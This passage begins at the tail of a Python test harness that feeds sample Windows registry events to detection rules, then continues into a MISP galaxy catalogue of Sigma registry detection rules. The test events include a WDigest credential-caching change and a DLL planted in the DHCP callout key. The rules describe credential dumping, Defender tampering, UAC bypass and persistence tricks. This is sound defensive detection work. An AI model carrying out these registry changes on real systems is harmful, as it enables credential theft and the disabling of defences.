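    _ev("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "HKLM\\System\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\\UseLogonCredential",
        "DWORD (0x00000001)"),
    _ev(REG, "HKLM\\System\\CurrentControlSet\\Services\\DHCPServer\\Parameters\\CalloutDlls",
        "C:\\Windows\\Temp\\callout.dll"),
    _ev(REG, "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\notepad.exe\\GlobalFlag",
        "DWORD (0x00000200)"),
    # Control: UserList value set to 1 (account shown), which no rule above covers.
    _ev("C:\\Windows\\System32\\svchost.exe",
        "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\Guest",
        "DWORD (0x00000001)"),
]

if __name__ == "__main__":
    for title, ev in evaluate(EVENTS):
        print(f"[{title}] {ev['Image']} -> {ev['TargetObject']} = {ev['Details']}")
```

The control event at the end is the point of the `details` clause: the SpecialAccounts path alone is not enough, since the same value written as 1 re-shows an account rather than hiding it. The DHCP rule deliberately has no `details` clause, because any DLL path written there is worth a look.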
Potential Persistence Via Outlook Today Page
Detects potential persistence activity via the Outlook Today page. An attacker can set a custom page to execute arbitrary code and link to it via the registry values "URL" and "UserDefinedUrl".
Internal MISP references
UUID 487bb375-12ef-41f6-baae-c6a1572b4dd1 which can be used as unique global reference for Potential Persistence Via Outlook Today Page in MISP communities and other software using the MISP galaxy
External references
- https://trustedsec.com/blog/specula-turning-outlook-into-a-c2-with-one-registry-change - webarchive
- https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=74 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_outlook_todaypage.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Tobias Michalski (Nextron Systems), David Bertho (@dbertho) & Eirik Sveen (@0xSV1), Storebrand |
| creation_date | 2021-06-10 |
| falsepositive | ['Unknown'] |
| filename | registry_set_persistence_outlook_todaypage.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.persistence', 'attack.t1112'] |
Related clusters
To see the related clusters, click here.
New Application in AppCompat
A general detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint.
Internal MISP references
UUID 60936b49-fca0-4f32-993d-7415edcf9a5d which can be used as unique global reference for New Application in AppCompat in MISP communities and other software using the MISP galaxy
External references
- https://github.com/OTRF/detection-hackathon-apt29/issues/1 - webarchive
- https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/1.A.1_DFD6A782-9BDB-4550-AB6B-525E825B095E.md - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_new_application_appcompat.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) |
| creation_date | 2020-05-02 |
| falsepositive | ['This rule is to explore new applications on an endpoint. False positives depends on the organization.', 'Newly setup system.', 'Legitimate installation of new application.'] |
| filename | registry_set_new_application_appcompat.yml |
| level | informational |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1204.002'] |
Related clusters
To see the related clusters, click here.
New BgInfo.EXE Custom DB Path Registry Configuration
Detects the setting of a new database path registry value in the BgInfo configuration. Attackers can, for example, set this value to save the results of the commands executed by BgInfo in order to exfiltrate information.
Internal MISP references
UUID 53330955-dc52-487f-a3a2-da24dcff99b5 which can be used as unique global reference for New BgInfo.EXE Custom DB Path Registry Configuration in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-08-16 |
| falsepositive | ['Legitimate use of external DB to save the results'] |
| filename | registry_set_bginfo_custom_db.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.t1112'] |
Related clusters
To see the related clusters, click here.
Disabled Windows Defender Eventlog
Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections
Internal MISP references
UUID fcddca7c-b9c0-4ddf-98da-e1e2d18b0157 which can be used as unique global reference for Disabled Windows Defender Eventlog in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-07-04 |
| falsepositive | ['Other Antivirus software installations could cause Windows to disable that eventlog (unknown)'] |
| filename | registry_set_disabled_microsoft_defender_eventlog.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1562.001'] |
Related clusters
To see the related clusters, click here.
Disable Tamper Protection on Windows Defender
Detects disabling Windows Defender Tamper Protection
Internal MISP references
UUID 93d298a1-d28f-47f1-a468-d971e7796679 which can be used as unique global reference for Disable Tamper Protection on Windows Defender in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Austin Songer @austinsonger |
| creation_date | 2021-08-04 |
| falsepositive | ['Unknown'] |
| filename | registry_set_disabled_tamper_protection_on_microsoft_defender.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1562.001'] |
Related clusters
To see the related clusters, click here.
Potential Credential Dumping Attempt Using New NetworkProvider - REG
Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it
Internal MISP references
UUID 0442defa-b4a2-41c9-ae2c-ea7042fc4701 which can be used as unique global reference for Potential Credential Dumping Attempt Using New NetworkProvider - REG in MISP communities and other software using the MISP galaxy
External references
- https://learn.microsoft.com/en-us/troubleshoot/windows-client/setup-upgrade-and-drivers/network-provider-settings-removed-in-place-upgrade - webarchive
- https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_new_network_provider.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-08-23 |
| falsepositive | ['Other legitimate network providers used and not filtered in this rule'] |
| filename | registry_set_new_network_provider.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1003'] |
Related clusters
To see the related clusters, click here.
Potential Persistence Via AppCompat RegisterAppRestart Layer
Detects the setting of the REGISTERAPPRESTART compatibility layer on an application. This compatibility layer allows an application to register for restart using the "RegisterApplicationRestart" API. This can be potentially abused as a persistence mechanism.
Internal MISP references
UUID b86852fb-4c77-48f9-8519-eb1b2c308b59 which can be used as unique global reference for Potential Persistence Via AppCompat RegisterAppRestart Layer in MISP communities and other software using the MISP galaxy
External references
- https://github.com/nasbench/Misc-Research/blob/d114d6a5e0a437d3818e492ef9864367152543e7/Other/Persistence-Via-RegisterAppRestart-Shim.md - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_app_cpmpat_layer_registerapprestart.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2024-01-01 |
| falsepositive | ['Legitimate applications making use of this feature for compatibility reasons'] |
| filename | registry_set_persistence_app_cpmpat_layer_registerapprestart.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1546.011'] |
Related clusters
To see the related clusters, click here.
Internet Explorer Autorun Keys Modification
Detects modification of autostart extensibility point (ASEP) in registry.
Internal MISP references
UUID a80f662f-022f-4429-9b8c-b1a41aaa6688 which can be used as unique global reference for Internet Explorer Autorun Keys Modification in MISP communities and other software using the MISP galaxy
External references
- https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - webarchive
- https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_internet_explorer.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) |
| creation_date | 2019-10-25 |
| falsepositive | ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason', 'Legitimate administrator sets up autorun keys for legitimate reason'] |
| filename | registry_set_asep_reg_keys_modification_internet_explorer.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.001'] |
Related clusters
To see the related clusters, click here.
Change User Account Associated with the FAX Service
Detects a change of the user account associated with the FAX service, made to avoid the escalation problem.
Internal MISP references
UUID e3fdf743-f05b-4051-990a-b66919be1743 which can be used as unique global reference for Change User Account Associated with the FAX Service in MISP communities and other software using the MISP galaxy
External references
- https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf - webarchive
- https://twitter.com/dottor_morte/status/1544652325570191361 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_fax_change_service_user.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-07-17 |
| falsepositive | ['Unknown'] |
| filename | registry_set_fax_change_service_user.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.t1112'] |
Related clusters
To see the related clusters, click here.
Disable PUA Protection on Windows Defender
Detects the disabling of Windows Defender PUA protection.
Internal MISP references
UUID 8ffc5407-52e3-478f-9596-0a7371eafe13 which can be used as unique global reference for Disable PUA Protection on Windows Defender in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Austin Songer @austinsonger |
| creation_date | 2021-08-04 |
| falsepositive | ['Unknown'] |
| filename | registry_set_disabled_pua_protection_on_microsoft_defender.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1562.001'] |
Related clusters
To see the related clusters, click here.
Potential PSFactoryBuffer COM Hijacking
Detects changes to the PSFactory COM InProcServer32 registry key. This technique was used by RomCom to create persistence by storing a malicious DLL.
Internal MISP references
UUID 243380fa-11eb-4141-af92-e14925e77c1b which can be used as unique global reference for Potential PSFactoryBuffer COM Hijacking in MISP communities and other software using the MISP galaxy
External references
- https://blogs.blackberry.com/en/2023/06/romcom-resurfaces-targeting-ukraine - webarchive
- https://www.virustotal.com/gui/file/6d3ab9e729bb03ae8ae3fcd824474c5052a165de6cb4c27334969a542c7b261d/detection - webarchive
- https://strontic.github.io/xcyclopedia/library/clsid_C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6.html - webarchive
- https://www.trendmicro.com/en_us/research/23/e/void-rabisu-s-use-of-romcom-backdoor-shows-a-growing-shift-in-th.html - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_comhijack_psfactorybuffer.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | BlackBerry Threat Research and Intelligence Team - @Joseliyo_Jstnk |
| creation_date | 2023-06-07 |
| falsepositive | ['Unknown'] |
| filename | registry_set_persistence_comhijack_psfactorybuffer.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1546.015'] |
Related clusters
To see the related clusters, click here.
Suspicious Path In Keyboard Layout IME File Registry Value
Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message. Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path. IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.
Internal MISP references
UUID 9d8f9bb8-01af-4e15-a3a2-349071530530 which can be used as unique global reference for Suspicious Path In Keyboard Layout IME File Registry Value in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | X__Junior (Nextron Systems) |
| creation_date | 2023-11-21 |
| falsepositive | ['Unknown'] |
| filename | registry_set_ime_suspicious_paths.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1562.001'] |
Related clusters
To see the related clusters, click here.
Potential Persistence Via DLLPathOverride
Detects when an attacker adds a new "DLLPathOverride" value to the "Natural Language" key in order to achieve persistence; the DLL will be invoked by the "SearchIndexer.exe" process.
Internal MISP references
UUID a1b1fd53-9c4a-444c-bae0-34a330fc7aa8 which can be used as unique global reference for Potential Persistence Via DLLPathOverride in MISP communities and other software using the MISP galaxy
External references
- https://persistence-info.github.io/Data/naturallanguage6.html - webarchive
- https://www.hexacorn.com/blog/2018/12/30/beyond-good-ol-run-key-part-98/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_natural_language.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-07-21 |
| falsepositive | ['Unknown'] |
| filename | registry_set_persistence_natural_language.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence'] |
Scheduled TaskCache Change by Uncommon Program
Monitors the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious.
Internal MISP references
UUID 4720b7df-40c3-48fd-bbdf-fd4b3c464f0d which can be used as unique global reference for Scheduled TaskCache Change by Uncommon Program in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Syed Hasan (@syedhasan009) |
| creation_date | 2021-06-18 |
| falsepositive | ['Unknown'] |
| filename | registry_set_taskcache_entry.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.execution', 'attack.persistence', 'attack.t1053', 'attack.t1053.005'] |
Related clusters
To see the related clusters, click here.
Potential Persistence Via Shim Database Modification
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.
Internal MISP references
UUID dfb5b4e8-91d0-4291-b40a-e3b0d3942c45 which can be used as unique global reference for Potential Persistence Via Shim Database Modification in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-3---registry-key-creation-andor-modification-events-for-sdb - webarchive
- https://andreafortuna.org/2018/11/12/process-injection-and-persistence-using-application-shimming/ - webarchive
- https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_shim_database.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2021-12-30 |
| falsepositive | ['Legitimate custom SHIM installations will also trigger this rule'] |
| filename | registry_set_persistence_shim_database.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1546.011'] |
Related clusters
To see the related clusters, click here.
Potential Ransomware Activity Using LegalNotice Message
Detects changes to the "LegalNoticeCaption" or "LegalNoticeText" registry values where the message set contains keywords often used in ransomware ransom messages.
Internal MISP references
UUID 8b9606c9-28be-4a38-b146-0e313cc232c1 which can be used as unique global reference for Potential Ransomware Activity Using LegalNotice Message in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-12-11 |
| falsepositive | ['Unknown'] |
| filename | registry_set_legalnotice_susp_message.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.impact', 'attack.t1491.001'] |
Related clusters
To see the related clusters, click here.
Potential Persistence Via Netsh Helper DLL - Registry
Detects changes to the Netsh registry key to add a new DLL value. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper.
Internal MISP references
UUID c90362e0-2df3-4e61-94fe-b37615814cb1 which can be used as unique global reference for Potential Persistence Via Netsh Helper DLL - Registry in MISP communities and other software using the MISP galaxy
External references
- https://pentestlab.blog/2019/10/29/persistence-netsh-helper-dll/ - webarchive
- https://www.ired.team/offensive-security/persistence/t1128-netsh-helper-dll - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_netsh_helper_dll_potential_persistence.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Anish Bogati |
| creation_date | 2023-11-28 |
| falsepositive | ['Legitimate helper added by different programs and the OS'] |
| filename | registry_set_netsh_helper_dll_potential_persistence.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1546.007'] |
Related clusters
To see the related clusters, click here.
Suspicious PowerShell In Registry Run Keys
Detects potential PowerShell commands or code within registry run keys.
Internal MISP references
UUID 8d85cf08-bf97-4260-ba49-986a2a65129c which can be used as unique global reference for Suspicious PowerShell In Registry Run Keys in MISP communities and other software using the MISP galaxy
External references
- https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html - webarchive
- https://github.com/frack113/atomic-red-team/blob/a9051c38de8a5320b31c7039efcbd3b56cf2d65a/atomics/T1547.001/T1547.001.md#atomic-test-9---systembc-malware-as-a-service-registry - webarchive
- https://github.com/HackTricks-wiki/hacktricks/blob/e4c7b21b8f36c97c35b7c622732b38a189ce18f7/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_in_run_keys.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113, Florian Roth (Nextron Systems) |
| creation_date | 2022-03-17 |
| falsepositive | ['Legitimate admin or third party scripts. Baseline according to your environment'] |
| filename | registry_set_powershell_in_run_keys.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.001'] |
Related clusters
To see the related clusters, click here.
COM Object Hijacking Via Modification Of Default System CLSID Default Value
Detects potential COM object hijacking via modification of default system CLSID.
Internal MISP references
UUID 790317c0-0a36-4a6a-a105-6e576bf99a14 which can be used as unique global reference for COM Object Hijacking Via Modification Of Default System CLSID Default Value in MISP communities and other software using the MISP galaxy
External references
- https://threatbook.io/blog/Analysis-of-APT-C-60-Attack-on-South-Korea - webarchive
- https://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/ - webarchive
- https://github.com/rtecCyberSec/BitlockMove - webarchive
- https://global.ptsecurity.com/analytics/pt-esc-threat-intelligence/darkhotel-a-cluster-of-groups-united-by-common-techniques - webarchive
- https://catalyst.prodaft.com/public/report/inside-the-latest-espionage-campaign-of-nebulous-mantis - webarchive
- https://blog.talosintelligence.com/uat-5647-romcom/ - webarchive
- https://cert.gov.ua/article/6284080 - webarchive
- https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ (idea)
- https://securelist.com/forumtroll-apt-hacking-team-dante-spyware/117851/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_builtin.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2024-07-16 |
| falsepositive | ['Unlikely'] |
| filename | registry_set_persistence_com_hijacking_builtin.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1546.015'] |
Related clusters
To see the related clusters, click here.
Change Winevt Channel Access Permission Via Registry
Detects tampering with the "ChannelAccess" registry key in order to change access to a Windows event channel.
Internal MISP references
UUID 7d9263bd-dc47-4a58-bc92-5474abab390c which can be used as unique global reference for Change Winevt Channel Access Permission Via Registry in MISP communities and other software using the MISP galaxy
External references
- https://app.any.run/tasks/77b2e328-8f36-46b2-b2e2-8a80398217ab/ - webarchive
- https://learn.microsoft.com/en-us/windows/win32/api/winevt/ - webarchive
- https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_winevt_channelaccess.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-09-17 |
| falsepositive | ['Unknown'] |
| filename | registry_set_change_winevt_channelaccess.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1562.002'] |
Related clusters
To see the related clusters, click here.
Outlook Macro Execution Without Warning Setting Enabled
Detects the modification of Outlook security setting to allow unprompted execution of macros.
Internal MISP references
UUID e3b50fa5-3c3f-444e-937b-0a99d33731cd which can be used as unique global reference for Outlook Macro Execution Without Warning Setting Enabled in MISP communities and other software using the MISP galaxy
External references
- https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53 - webarchive
- https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_outlook_enable_macro_execution.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | @ScoubiMtl |
| creation_date | 2021-04-05 |
| falsepositive | ['Unlikely'] |
| filename | registry_set_office_outlook_enable_macro_execution.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.command-and-control', 'attack.t1137', 'attack.t1008', 'attack.t1546'] |
Related clusters
To see the related clusters, click here.
FileFix - Command Evidence in TypedPaths from Browser File Upload Abuse
Detects commonly-used chained commands and strings in the most recent 'url' value of the 'TypedPaths' key, which could be indicative of a user being targeted by the FileFix technique.
Internal MISP references
UUID 4fee3d51-8069-4a4c-a0f7-924fcaff2c70 which can be used as unique global reference for FileFix - Command Evidence in TypedPaths from Browser File Upload Abuse in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Alfie Champion (delivr.to) |
| creation_date | 2025-07-05 |
| falsepositive | ['Unknown'] |
| filename | registry_set_filefix_typedpath_commands.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1204.004'] |
Related clusters
To see the related clusters, click here.
Enable LM Hash Storage
Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes. By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.
Internal MISP references
UUID c420410f-c2d8-4010-856b-dffe21866437 which can be used as unique global reference for Enable LM Hash Storage in MISP communities and other software using the MISP galaxy
External references
- https://www.sans.org/blog/protecting-privileged-domain-accounts-lm-hashes-the-good-the-bad-and-the-ugly/ - webarchive
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a - webarchive
- https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/prevent-windows-store-lm-hash-password - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_system_lsa_nolmhash.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-12-15 |
| falsepositive | ['Unknown'] |
| filename | registry_set_system_lsa_nolmhash.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.t1112'] |
Related clusters
To see the related clusters, click here.
Office Macros Warning Disabled
Detects registry changes to Microsoft Office "VBAWarning" to a value of "1" which enables the execution of all macros, whether signed or unsigned.
Internal MISP references
UUID 91239011-fe3c-4b54-9f24-15c86bb65913 which can be used as unique global reference for Office Macros Warning Disabled in MISP communities and other software using the MISP galaxy
External references
- https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/ - webarchive
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/ - webarchive
- https://twitter.com/inversecos/status/1494174785621819397 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_vba_warnings_tamper.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Trent Liffick (@tliffick), Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2020-05-22 |
| falsepositive | ['Unlikely'] |
| filename | registry_set_office_vba_warnings_tamper.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.t1112'] |
Related clusters
To see the related clusters, click here.
Bypass UAC Using DelegateExecute
Bypasses User Account Control using a fileless method.
Internal MISP references
UUID 46dd5308-4572-4d12-aa43-8938f0184d4f which can be used as unique global reference for Bypass UAC Using DelegateExecute in MISP communities and other software using the MISP galaxy
External references
- https://devblogs.microsoft.com/oldnewthing/20100312-01/?p=14623 - webarchive
- https://learn.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-7---bypass-uac-using-sdclt-delegateexecute - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-01-05 |
| falsepositive | ['Unknown'] |
| filename | registry_set_bypass_uac_using_delegateexecute.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.defense-evasion', 'attack.t1548.002'] |
Related clusters
To see the related clusters, click here.
Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting
Detects the modification of the Outlook setting "LoadMacroProviderOnBoot", which, if enabled, allows the automatic loading of any configured VBA project/module.
Internal MISP references
UUID 396ae3eb-4174-4b9b-880e-dc0364d78a19 which can be used as unique global reference for Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting in MISP communities and other software using the MISP galaxy
External references
- https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53 - webarchive
- https://www.linkedin.com/pulse/outlook-backdoor-using-vba-samir-b-/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_outlook_enable_load_macro_provider_on_boot.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2021-04-05 |
| falsepositive | ['Unknown'] |
| filename | registry_set_office_outlook_enable_load_macro_provider_on_boot.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.command-and-control', 'attack.t1137', 'attack.t1008', 'attack.t1546'] |
Related clusters
To see the related clusters, click here.
Disable Exploit Guard Network Protection on Windows Defender
Detects the disabling of Windows Defender Exploit Guard Network Protection.
Internal MISP references
UUID bf9e1387-b040-4393-9851-1598f8ecfae9 which can be used as unique global reference for Disable Exploit Guard Network Protection on Windows Defender in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Austin Songer @austinsonger |
| creation_date | 2021-08-04 |
| falsepositive | ['Unknown'] |
| filename | registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1562.001'] |
Related clusters
To see the related clusters, click here.
Change the Fax Dll
Detects possible persistence via a Fax DLL load when the service restarts.
Internal MISP references
UUID 9e3357ba-09d4-4fbd-a7c5-ad6386314513 which can be used as unique global reference for Change the Fax Dll in MISP communities and other software using the MISP galaxy
External references
- https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf - webarchive
- https://twitter.com/dottor_morte/status/1544652325570191361 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_fax_dll_persistance.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-07-17 |
| falsepositive | ['Unknown'] |
| filename | registry_set_fax_dll_persistance.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.t1112'] |
Related clusters
To see the related clusters, click here.
Internet Explorer DisableFirstRunCustomize Enabled
Detects changes to the Internet Explorer "DisableFirstRunCustomize" value, which prevents Internet Explorer from running the first run wizard the first time a user starts the browser after installing Internet Explorer or Windows.
Internal MISP references
UUID ab567429-1dfb-4674-b6d2-979fd2f9d125 which can be used as unique global reference for Internet Explorer DisableFirstRunCustomize Enabled in MISP communities and other software using the MISP galaxy
External references
